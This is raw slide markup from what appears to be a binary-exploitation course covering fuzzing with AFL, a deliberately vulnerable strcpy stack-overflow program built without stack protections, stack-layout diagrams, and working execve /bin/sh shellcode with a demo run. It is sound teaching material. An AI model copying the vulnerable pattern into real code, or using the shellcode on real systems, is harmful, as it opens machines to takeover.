          <p:cNvPr id="1183" name="Shape 1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objdump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IDA Pro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Binnavi - https://github.com/google/binnavi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Bindiff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Shape 1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Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Shape 1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Gdb (peda enhanced will be better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https://github.com/longld/peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 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lldb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Qira by geohot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https://github.com/BinaryAnalysisPlatform/qira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strace/dtrace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Unicorn engine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https://github.com/angr/angr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http://triton.quarkslab.com/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fuzzy lop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1195" name="Shape 1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Fuzzing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Software testing technique (black box)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Generate malformed input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 crashes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AFL is unique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Genetic fuzzer: uses branch instrumentation (grey box)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Amazingly good to find deep/unusual paths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Found hundreds of security vulnerabilities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Open source, developed by Michal Zalewski (lcamtuf)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1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http://lcamtuf.coredump.cx/afl/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AFL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201" name="Shape 1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Fuzz software with source code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afl-gcc/afl-g++ to compile source code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instrumentation by LLVM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Directly fuzz binaries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Qemu emulator(afl-fuzz -Q mode)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instrumentation by Qemu's dynamic binary translation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architecture support powered by Qemu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slower than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Seeds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seeds will accelerate crash discovery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List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pwntools/zio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gdb/peda/pwndbg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https://github.com/longld/peda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checksec.sh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rp++/ROPGadget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https://github.com/0vercl0k/rp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https://github.com/JonathanSalwan/ROPgadget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IDA Pro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Unicorn engine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http://www.unicorn-engine.org/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Fuzzing stack overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Shape 1207"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588000" y="1110552"/>
            <a:ext cx="7688100" cy="106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echo hello &gt; in/hello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afl-fuzz -Q -i in -o out ./ropasaurusrex_x64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ls -l out/crashes/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-rw------- 1 user user 142 May  8 17:14 id:000000,sig:11,src:000000,op:havoc,rep:64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08" name="Shape 1208"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3229" l="0" r="1097" t="2617"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="588000" y="2220000"/>
            <a:ext cx="7688100" cy="276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Shape 1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Pwn Toolkits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1214" name="Shape 1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zio - io framework for pwning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interface and easy to use.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https://github.com/zTrix/zio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Pwntools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Pwn framework with a lot of functions integrated.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http://pwntools.com/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https://github.com/gallopsled/pwntools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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1220" name="Shape 1220"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3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Overflow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Shellcode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Pivot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DynElf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Overflow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String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Leak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Write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ebp(rbp) pairs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Overflow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Bin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Unlink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After Free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Stack Overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1226" name="Shape 1226"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1519650" y="1420138"/>
            <a:ext cx="38286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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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 main(int argc, char **argv)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char buf[128];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if (argc &lt; 2) return 1;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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy(buf, argv[1]);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printf("argv[1]: %s\n", buf);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return 0;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7" name="Shape 1227"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643450" y="4164875"/>
            <a:ext cx="8022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Build command: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gcc -z execstack -fno-stack-protector bof.c -o bof –m32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8" name="Shape 1228"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939300" y="1121000"/>
            <a:ext cx="2497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BOF program:</a:t>
            </a:r>
            <a:endParaRPr b="1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Shape 1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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1234" name="Shape 1234"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4796900" y="1852538"/>
            <a:ext cx="38286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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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main(int argc, char **argv)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char buf[128];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if (argc &lt; 2) return 1;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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy(buf, argv[1]);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printf("argv[1]: %s\n", buf);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return 0;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5" name="Shape 1235"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4216550" y="1553400"/>
            <a:ext cx="2497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BOF program:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1236" name="Shape 1236"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="180930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**argv</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1237" name="Shape 1237"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="211650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argc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1238" name="Shape 1238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="242370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</a:t>
            </a:r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1464925" y="273090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%ebp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1240" name="Shape 1240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="3038100"/>
            <a:ext cx="1571400" cy="122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buf[128]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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1246" name="Shape 1246"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4796900" y="1852538"/>
            <a:ext cx="38286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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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main(int argc, char **argv)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char buf[128];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if (argc &lt; 2) return 1;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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy(buf, argv[1]);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printf("argv[1]: %s\n", buf);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return 0;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7" name="Shape 1247"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4216550" y="1553400"/>
            <a:ext cx="2497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BOF program:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1248" name="Shape 1248"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="180930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**argv</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1249" name="Shape 1249"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="211650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argc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1250" name="Shape 1250"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="242370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buf[132~135]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1251" name="Shape 1251"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="273090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buf[128~131]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1252" name="Shape 1252"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="3038100"/>
            <a:ext cx="1571400" cy="122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buf[0~127]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1253" name="Shape 1253"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1183450" y="2458000"/>
            <a:ext cx="0" cy="179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4" name="Shape 1254"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648625" y="3049675"/>
            <a:ext cx="81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5" name="Shape 1255"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193450" y="2691150"/>
            <a:ext cx="887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Stack Overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1261" name="Shape 1261"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4796900" y="1852538"/>
            <a:ext cx="38286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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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main(int argc, char **argv)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char buf[128];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if (argc &lt; 2) return 1;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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy(buf, argv[1]);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printf("argv[1]: %s\n", buf);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return 0;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2" name="Shape 1262"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4216550" y="1553400"/>
            <a:ext cx="2497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BOF program:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1263" name="Shape 1263"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="180930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**argv</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1264" name="Shape 1264"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="211650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argc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1265" name="Shape 1265"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="242370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 addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1266" name="Shape 1266"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="273090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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1267" name="Shape 1267"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="3038100"/>
            <a:ext cx="1571400" cy="122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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1268" name="Shape 1268"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1265" idx="3"/>
            <a:endCxn id="1267" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3036325" y="2577300"/>
            <a:ext cx="600" cy="10710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Shape 1269"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1183450" y="2458000"/>
            <a:ext cx="0" cy="179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Shape 1270"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648625" y="3049675"/>
            <a:ext cx="81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71" name="Shape 1271"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193450" y="2691150"/>
            <a:ext cx="887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Stack Overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1277" name="Shape 1277"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4796900" y="1852538"/>
            <a:ext cx="38286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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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main(int argc, char **argv)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char buf[128];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if (argc &lt; 2) return 1;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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy(buf, argv[1]);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printf("argv[1]: %s\n", buf);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return 0;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8" name="Shape 1278"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4216550" y="1553400"/>
            <a:ext cx="2497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BOF program:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1279" name="Shape 1279"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="180930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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1280" name="Shape 1280"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="211650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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1281" name="Shape 1281"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="242370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 addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1282" name="Shape 1282"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="2730900"/>
            <a:ext cx="15714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buf[128~131]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283" name="Shape 1283"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464925" y="3038100"/>
            <a:ext cx="1571400" cy="122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buf[0~127]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1284" name="Shape 1284"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="1280" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2882425" y="2423400"/>
            <a:ext cx="307200" cy="600"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd fmla="val -1896" name="adj1"/>
              <a:gd fmla="val 397875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5" name="Shape 1285"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1172050" y="1809400"/>
            <a:ext cx="11400" cy="244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6" name="Shape 1286"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648625" y="3049675"/>
            <a:ext cx="81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87" name="Shape 1287"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193450" y="2691150"/>
            <a:ext cx="887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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1293" name="Shape 1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shellcode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 small piece of code used as the payload in the exploitation of a software vulnerability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Typically it starts a command shell from which the attacker can control the compromised machine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use here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 use execve system call to obtain a high-permission level shell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Ref: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http://www.shell-storm.org/shellcode/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shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1299" name="Shape 1299"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="568975" y="1149325"/>
            <a:ext cx="7681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execve(const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filename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*const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argv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[],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*const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envp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[]);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Shape 1300"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6372925" y="2323913"/>
            <a:ext cx="1869300" cy="1536000"/>
            <a:chOff x="3152525" y="1888975"/>
            <a:chExt cx="1869300" cy="1536000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1301" name="Shape 1301"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3152525" y="1888975"/>
              <a:ext cx="1869300" cy="30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3152525" y="2196175"/>
              <a:ext cx="1869300" cy="30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0x68732f2f="</a:t>
              </a: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//sh"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3152525" y="2503375"/>
              <a:ext cx="1869300" cy="30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0x6e69622f="/bin"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3152525" y="2810575"/>
              <a:ext cx="1869300" cy="30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3152525" y="3117775"/>
              <a:ext cx="1869300" cy="307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char *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06" name="Shape 1306"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2662800" y="1957250"/>
            <a:ext cx="3197700" cy="2269325"/>
            <a:chOff x="5735225" y="1793025"/>
            <a:chExt cx="3197700" cy="2269325"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1307" name="Shape 1307"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735225" y="2127950"/>
              <a:ext cx="3197700" cy="19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Char char="●"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syscall number: %eax=0xb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Char char="●"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1st arg: %ebx=filename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Char char="●"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2nd arg: %ecx=argv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Char char="●"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3rd arg: %edx=envp=0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Char char="●"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4th arg: %esi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Char char="●"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5th arg: %edi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Char char="●"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6th arg: %ebp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08" name="Shape 1308"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5903525" y="1793025"/>
              <a:ext cx="2861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Syscall Calling convention:</a:t>
              </a:r>
              <a:endParaRPr b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1309" name="Shape 1309"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1305" idx="3"/>
            <a:endCxn id="1303" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="8242225" y="3091913"/>
            <a:ext cx="600" cy="6144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10" name="Shape 1310"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="568975" y="1854850"/>
            <a:ext cx="2787900" cy="3106450"/>
            <a:chOff x="568975" y="1854850"/>
            <a:chExt cx="2787900" cy="3106450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1311" name="Shape 1311"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="648650" y="1854850"/>
              <a:ext cx="2093700" cy="28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xor %eax, %eax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pushl %eax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push $0x68732f2f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push $0x6e69622f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movl %esp, %ebx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pushl %eax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pushl %ebx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movl %esp, %ecx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cltd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movb $0xb, %al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int $0x80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12" name="Shape 1312"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="568975" y="4522400"/>
              <a:ext cx="2787900" cy="43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22222"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>sign-extend EAX -&gt; EDX:EAX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13" name="Shape 1313"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="1312" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="142675" y="4144850"/>
              <a:ext cx="1023300" cy="170700"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector4">
              <a:avLst>
                <a:gd fmla="val 247" name="adj1"/>
                <a:gd fmla="val 239499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14" name="Shape 1314"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5416602" y="2944025"/>
            <a:ext cx="645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ebx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15" name="Shape 1315"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1314" idx="3"/>
            <a:endCxn id="1303" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6061602" y="3091925"/>
            <a:ext cx="3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6" name="Shape 1316"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5416400" y="3564125"/>
            <a:ext cx="645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%ecx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17" name="Shape 1317"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1316" idx="3"/>
            <a:endCxn id="1318" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6061400" y="3712025"/>
            <a:ext cx="3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and Linking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403125" y="1733863"/>
            <a:ext cx="2086800" cy="295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Code (p1.c p2.c)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403125" y="2443963"/>
            <a:ext cx="2086800" cy="295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Assembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (p1.s p2.s)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403125" y="3154063"/>
            <a:ext cx="2086800" cy="29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(p1.o p2.o)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403125" y="3864175"/>
            <a:ext cx="2086800" cy="295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 (p)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="115" name="Shape 115"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="111" idx="2"/>
            <a:endCxn id="112" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3446525" y="2029063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Shape 116"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="112" idx="2"/>
            <a:endCxn id="113" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3446525" y="2739163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Shape 117"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="113" idx="2"/>
            <a:endCxn id="114" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3446525" y="3449263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Shape 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3595475" y="2088913"/>
            <a:ext cx="2086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compiler: gcc -S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754900" y="2799013"/>
            <a:ext cx="2086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assembler: gcc or as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3595475" y="3509113"/>
            <a:ext cx="2086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linker: gcc or ld</a:t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612025" y="3154063"/>
            <a:ext cx="2086800" cy="29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Library (.a)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="122" name="Shape 122"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="121" idx="2"/>
            <a:endCxn id="114" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4490025" y="3449263"/>
            <a:ext cx="21654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shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1324" name="Shape 1324"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482400" y="1103850"/>
            <a:ext cx="3477600" cy="394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shellcode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__asm__(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"xor %eax, %eax\n\t"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"pushl %eax\n\t"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"push $0x68732f2f\n\t"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"push $0x6e69622f\n\t"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"movl %esp, %ebx\n\t"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"pushl %eax\n\t"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"pushl %ebx\n\t"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"movl %esp, %ecx\n\t"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"cltd\n\t"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"movb $0xb, %al\n\t"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"int $0x80\n\t"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main(int argc, char **argv)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shellcode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5" name="Shape 1325"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2822100" y="1650025"/>
            <a:ext cx="11379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shellcode.c</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1326" name="Shape 1326"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4096575" y="1104000"/>
            <a:ext cx="4735800" cy="17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user@ubuntu:~/Challenges/shellcode$ gcc -z execstack -m32 -o shellcode  shellcode.c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user@ubuntu:~/Challenges/shellcode$ ./shellcode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id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uid=1000(user) gid=1000(user) groups=1000(user),27(sudo)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7" name="Shape 1327"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4376775" y="2942575"/>
            <a:ext cx="424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https://github.com/zTrix/sct</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
